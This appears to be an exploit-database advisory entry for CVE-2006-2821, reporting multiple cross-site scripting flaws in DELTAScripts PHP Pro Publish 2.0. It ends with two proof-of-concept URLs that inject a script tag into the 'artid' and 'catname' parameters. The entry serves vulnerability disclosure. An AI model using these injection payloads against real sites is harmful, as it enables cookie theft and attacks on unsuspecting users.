DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities
Author: Soot
type: webapps
platform: php
port:
date_added: 2006-06-02
date_updated: 2013-08-30
verified: 1
codes: CVE-2006-2821;OSVDB-25978
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/18243/info
PHP Pro Publish is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/propublish/art.php?artid="><script>alert(/Soot/)</script>
http://www.example.com/propublish/cat.php?catname="><script>alert(/Soot/)</script>